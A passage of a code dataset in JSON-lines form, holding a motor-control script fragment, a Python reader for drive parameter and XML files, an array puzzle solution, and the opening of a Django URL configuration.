record.current = can_motors.current if can_motors.current < 10000 else 0\n record.weight = can_motors.weight\n record.save()\n\n sleep(record.total_time)\n print('initial...gaga...')\n\n can_motors.speed_mode(0)\n can_motors.weight = 0\n z.speed_mode(-200)\n sleep(1.5)\n z.speed_mode(0)\n can_motors.weight_z = 0\n\n config_data = ScrewConfig()\n config_data.n = weight\n config_data.power = power\n config_data.direction = direction\n config_data.speed = speed1\n config_data.actual_speed = actual_speed\n config_data.cycle = m\n config_data.save()\n\n print('initial...end...')\n sleep(2)\n\n print('initial...again...')\n break\n\n # else:\n # print('stand by...')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"control/demo_adjust_run_screw_3_new.py","file_name":"demo_adjust_run_screw_3_new.py","file_ext":"py","file_size_in_byte":24629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"418188863","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@Time : 2017/6/19 21:47\n@Author : Mr.Sprint\n@File : Read_xml.py\n@Software: PyCharm\n'''\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport easygui as g\nimport os.path\nimport binascii\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nimport csv\nflag = 1\nMM_ID_Str = str()\nread_file_dict = dict()#normal mme file\nparameter_dict = dict()#just for parameter\npar_filecontent_list = list()\nParameterRecord_dict = dict()\nChoiceTable_dict = dict()\ncommand_list =[\n \"Read Firmware\",\n \"Read SIVP\",#Filename, version number, list of parameters+values in the file\n \"Read CSIV\",#Filename, version number, list of parameters+values in the file\n \"Read Parameter\",#List of parameters+values in the file\n \"Motor DataBase\",\n 'All File'\n ]\n\n\ndef paremeter_read_lines(filename):\n with open(filename, 'rb') as f:\n for each_lines in f:\n for each_char in each_lines:\n par_filecontent_list.append(int(binascii.b2a_hex(each_char), 16))\n parameter_dict['File Type'] = par_filecontent_list[0:1]\n parameter_dict['Type code'] = par_filecontent_list[8:9]\n parameter_dict['Num of parameters'] = par_filecontent_list[9:10]\n parameter_dict['Size of enter header'] = par_filecontent_list[10:11]\n parameter_dict['File format version'] = par_filecontent_list[11:13]\n parameter_dict['Software version'] = par_filecontent_list[13:15]\n parameter_dict['databese version'] = par_filecontent_list[15:17]\n parameter_dict['Motor Power'] = par_filecontent_list[17:18]\n parameter_dict['Motor Voltage'] = par_filecontent_list[18:19]\n parameter_dict['Motor Frequency'] = par_filecontent_list[19:20]\n parameter_dict[r'Signal phase/Three phase'] = par_filecontent_list[20:21]\n\ndef file_read_lines(filename):\n #将来这里要清除字典的信息\n filecontent_list = list()\n with open(filename, 'rb') as f:\n for each_lines in f:\n for each_char in each_lines:\n filecontent_list.append(int(binascii.b2a_hex(each_char), 16))\n read_file_dict['File Format'] = filecontent_list[0:1]\n read_file_dict['Number of elements'] = filecontent_list[1:3]\n read_file_dict['File Version'] = filecontent_list[3:4]\n read_file_dict['MMM ID'] = filecontent_list[4:22]\n\ndef find_MMfile(dirpath,filename):\n for root, dirs, files in os.walk(dirpath):\n for file in files:\n if filename == file:\n if filename == 'CSIV.mme' or filename == 'SIVP.mme' or filename == 'Parameter.par':\n paremeter_read_lines(filename)\n else:\n file_read_lines(filename)\n\ndef create_csv_file():\n pass\n\ndef read_xmlfile(filename):\n\n # 使用minidom解析器打开XML文档\n DOMTree = xml.dom.minidom.parse(\"FC280_0140.xml\")\n Data = DOMTree.documentElement\n ParameterRecords = Data.getElementsByTagName(\"ParameterRecord\")\n ChoiceRecords = Data.getElementsByTagName(\"ChoiceRecord\")\n print(\"*****ParameterRecord*****\")\n for ParameterRecord in ParameterRecords:\n try:\n data_dict = dict()\n Index = ParameterRecord.getElementsByTagName('ParamIndex')[0]\n data_dict['ParamIndex'] = Index.childNodes[0].data\n\n Mark = ParameterRecord.getElementsByTagName('ParamMark')[0]\n data_dict['ParamMark'] = Mark.childNodes[0].data\n\n ReadOnly = ParameterRecord.getElementsByTagName('ReadOnly')[0]\n data_dict['ReadOnly'] = ReadOnly.childNodes[0].data\n\n ShowInPC = ParameterRecord.getElementsByTagName('ShowInPC')[0]\n data_dict['ShowInPC'] = ShowInPC.childNodes[0].data\n\n ChoiceTableIndex = ParameterRecord.getElementsByTagName('ChoiceTableIndex')[0]\n data_dict['ChoiceTableIndex'] = ChoiceTableIndex.childNodes[0].data\n except IndexError as e:\n print (e)\n finally:\n Number = ParameterRecord.getElementsByTagName('ParamNumber')[0]\n ParameterRecord_dict[Number.childNodes[0].data] = data_dict\n\n print (ParameterRecord_dict)\n print(\"*****ChoiceRecord*****\")\n for ChoiceRecord in ChoiceRecords:\n\n data_dict = dict()\n ChoiceName = ChoiceRecord.getElementsByTagName('ChoiceName')[0]\n data_dict['ChoiceName'] = ChoiceName.childNodes[0].data\n ChoiceDescription = ChoiceRecord.getElementsByTagName('ChoiceDescription')[0]\n data_dict['ChoiceDescription'] = ChoiceDescription.childNodes[0].data\n\n ChoiceValue = ChoiceRecord.getElementsByTagName('ChoiceValue')[0]\n data_dict['ChoiceValue'] = ChoiceValue.childNodes[0].data\n\n Index = ChoiceRecord.getElementsByTagName('Index')[0]\n ChoiceTable_dict[Index.childNodes[0].data] = data_dict\n print(ChoiceTable_dict)\n\nread_xmlfile(\"FC280_0140.xml\")\n\n'''dirname = g.diropenbox(\"Please Open MM Folder\")\nos.chdir(dirname)\n\nfind_MMfile('.','FIRMWARE.MME')\nfor MM_ID in read_file_dict['MMM ID'][8:18]:\n MM_ID_Str = MM_ID_Str + ' ' + \"%d\" % MM_ID\nMM_msg = \"Read MM ID Success\\nMM ID is\" + MM_ID_Str\nwhile(flag):\n replay = g.choicebox(MM_msg, title='Danfoss MM PC tools',choices=command_list)\n if replay not in command_list:\n quit()\n elif replay == 'All File':\n pass\n else:\n replay = replay.split(' ')[1] + \".mme\"\n find_MMfile('.',replay)\n'''\n","sub_path":"Read_xml.py","file_name":"Read_xml.py","file_ext":"py","file_size_in_byte":5459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"179599617","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/7/13 17:30\n# @Author : lirixiang\n# @Email : 565539277@qq.com\n# @File : 40-FindNumsAppearOnce.py\n\"\"\"\n一个整型数组里除了两个数字之外,其他的数字都出现了两次。请写程序找出这两个只出现一次的数字。\n\"\"\"\n# -*- coding:utf-8 -*-\nclass Solution:\n # 返回[a,b] 其中ab是出现一次的两个数字\n def FindNumsAppearOnce(self, array):\n # write code here\n noRepeatList = []\n for i in range(len(array)):\n if array[i] not in noRepeatList:\n noRepeatList.append(array[i])\n\n result = {}\n for i in range(len(noRepeatList)):\n count = 0\n for j in range(len(array)):\n if noRepeatList[i] == array[j]:\n count += 1\n result[noRepeatList[i]] = count\n\n resList = []\n for i in result:\n if result[i] == 1:\n resList.append(i)\n return resList\n\n\n\n","sub_path":"src/剑指offer/40-FindNumsAppearOnce.py","file_name":"40-FindNumsAppearOnce.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"256025647","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.hot, name='hot'),\n url(r'^grab$', views.index, name='index'),\n url(r'^(?P\\d+)/(?P